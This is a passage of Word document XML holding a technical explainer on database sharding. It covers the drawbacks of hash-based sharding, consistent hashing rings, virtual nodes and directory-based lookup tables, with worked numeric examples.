    <w:p w14:paraId="42F58340" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Even if user_id values are clustered, hash output is uniform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB906AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Works for: integer IDs, string IDs, UUIDs, composite keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58418E7C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash-based sharding disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66040602" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43676832" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Range queries become scatter-gather:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71152E76" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT * FROM orders WHERE user_id BETWEEN 100 AND 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A45F13" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → user_id 100 → Shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E03FA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → user_id 101 → Shard 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5FA9F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → user_id 102 → Shard 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C9E9E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E1327" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Must query ALL shards and merge results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB18D78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D0751" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  This is catastrophic for range-heavy workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E7648" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Mitigation: route range queries via secondary data structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EC8969" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              (lookup table: range → shard, maintained separately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78607881" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBD444" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Resharding requires full data migration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B01A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Adding shard 5 to 4-shard cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B5269" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    shard_id = hash(key) % 4 → shard_id = hash(key) % 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA571D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Every key maps to a different shard with modulo 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520C5071" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Must migrate ~80% of all data to new shard assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76E002" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    During migration: queries must handle both old and new mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C8838" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Extremely disruptive — requires careful planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08827782" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F5B52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Consistent hashing mitigates this (see below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF08E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent Hashing — the solution to resharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38950432" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Standard hash(key) % N requires remapping all keys when N changes. Consistent hashing minimizes remapping to K/N keys (where K is total keys) when one shard is added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CEC52F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ring structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F7FCD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86D29B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Consistent hash ring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A7D2B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hash output space: 0 to 2^32 - 1 (or 0 to 2^64 - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0B3F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Arrange this space as a circle (ring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F3C571" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA764A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Place shards on the ring at positions determined by hash(shard_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8C07D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard A: hash("shard_A") = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D3973" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard B: hash("shard_B") = 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E1D9E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Shard C: hash("shard_C") = 700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047146C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B48A80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Ring:   0                                             2^32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131F3F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          |----A(100)---------B(300)--------C(700)------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44683B2B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB2B98F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Key routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C859416" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  key X: hash(X) = 450</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8F1AFC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Walk clockwise from 450 until you hit a shard node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0B0D4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Hits B(300)? No, 450 &gt; 300. Hits C(700)? Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F099E42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Key X is assigned to Shard C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0923AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA1ADB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (For keys between C and A going around the ring: assigned to A, wrapping around)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D52531" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70009646" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Key assignment ranges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191F496" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard A: keys where hash(key) </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∈</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> (700, 100] (wrapping around)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376113C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard B: keys where hash(key) </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∈</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> (100, 300]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223FB738" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard C: keys where hash(key) </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∈</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> (300, 700]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164AC99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adding a shard with consistent hashing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E277A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D2826" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Add Shard D at position 500:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979FAF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="179D4D3B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A88AF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard C owns: (300, 700]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E78729" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139058B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>After adding D(500):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03964A37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard C owns: (300, 500] → reduced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9D39C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard D owns: (500, 700] → new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0927CC6B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D9D6B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Keys migrated: only those with hash in (500, 700] → moved from C to D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E62D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Total migration: approximately K/N keys (where K=total keys, N=old shard count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F30629" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>For 100M keys across 4 shards: ~25M keys migrated per new shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4018F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  vs. simple modulo: ~80M keys migrated per new shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A1C1D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual nodes (vnodes) — solving uneven distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE54580" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>With few physical nodes, random ring placement causes uneven distribution. Virtual nodes solve this by placing each physical node at multiple positions on the ring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8057B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7328D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>100 virtual nodes per physical shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B1029" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard A: 100 positions on the ring (hash("shard_A_vnode_0"), hash("shard_A_vnode_1"), ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7AC91" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard B: 100 positions on the ring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A40EF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard C: 100 positions on the ring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DE0C58" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C48D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Statistical guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D219EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    With 100 vnodes/node and 3 nodes: each node owns ~33% of the ring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35393BB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Variance: ~1-2% across nodes (much better than 3 physical positions with high variance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB4B22B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022421E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Adding a new node D: it claims ~100/400 = 25% of positions from existing nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3514D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each existing node gives up ~1/4 of its data → even migration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726DADAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD1625" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cassandra uses 256 vnodes by default (murmur3 partitioner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F378826" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>DynamoDB uses consistent hashing with vnodes internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006ED347" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory-Based (Lookup Table) Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC0A7C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>A separate directory service maintains an explicit mapping from partition key values (or ranges) to shard IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011AF9AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E899B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Directory service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305CF837" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Key-value store (Redis, DynamoDB, or dedicated metadata DB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB1DF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    tenant_id "acme"      → Shard 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A8B4CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    tenant_id "globocorp" → Shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D03A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    tenant_id "startup"   → Shard 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F1D5B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    user_id range [0, 250M) → Shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA0A239" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    user_id range [250M, 500M) → Shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C4F41" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F955D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F0227" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Application queries directory: GET /shard?key=tenant_id:acme</w:t>
      </w:r>
    </w:p>
